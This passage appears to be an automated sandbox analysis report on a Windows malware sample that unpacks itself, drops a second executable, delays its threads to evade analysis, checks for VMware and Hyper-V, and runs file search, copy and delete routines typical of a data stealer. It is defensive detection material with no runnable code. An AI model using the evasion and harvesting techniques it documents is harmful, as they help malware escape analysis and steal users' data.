                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeUnpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xarocuz:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeUnpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xuxoz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeUnpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeUnpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0041EC6E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC6E
                  Source: 6X4BIzTTBR.exeStatic PE information: section name: .xarocuz
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .xuxoz
                  Source: ED60.tmp.exe.0.drStatic PE information: section name: .xuxoz
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00410776 push ecx; ret 0_2_00410789
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0043DB87 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB8B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0040FDA2 push ecx; ret 0_2_0040FDB5
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C0F209 push ebx; retf 0_2_02C0F213
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C13375 pushad ; ret 0_2_02C13391
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C134F2 push ecx; ret 0_2_02C1350F
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C108EB pushad ; ret 0_2_02C108ED
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C0D805 pushad ; retf 0_2_02C0D80D
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C10D68 push 00000003h; ret 0_2_02C10D6C
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E0009 push ecx; ret 0_2_046E001C
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_04709DF8 pushad ; retf 0_2_04709DFF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_04707FAD push esp; retf 0_2_04707FAE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E09DD push ecx; ret 0_2_046E09F0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_047079AF push esp; retf 0_2_047079B7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C97D0C push ecx; ret 1_2_02C97D1F
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D70276 pushad ; iretd 1_2_02D70277
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D728EE push ebx; iretd 1_2_02D72908
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D6F192 push 00000032h; retf 1_2_02D6F194
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D6E177 push ebx; ret 1_2_02D6E1F4
                  Source: 6X4BIzTTBR.exeStatic PE information: section name: .text entropy: 7.550335465117481
                  Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.117299996863085
                  Source: ED60.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.117299996863085
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0040E98A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E98A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeWindow / User API: threadDelayed 5292Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeWindow / User API: threadDelayed 4695Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_1-30980
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-63841
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI coverage: 2.9 %
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep count: 5292 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep time: -3820824s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep count: 4695 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe TID: 7500Thread sleep time: -3389790s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C84ED7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C84EF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8E657
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81607
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81620
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C83CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C83CD7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C81C57
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8D037
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C7DDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C8D987
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_02C8E187
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C71907
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C71920
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00421DC0 EntryPoint,GetSystemInfo,GetUserDefaultLangID,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,OpenEventA,CreateEventA,1_2_00421DC0
                  Source: Amcache.hve.7.drBinary or memory string: VMware
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4065357842.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091842087.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DDA000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware\Kp
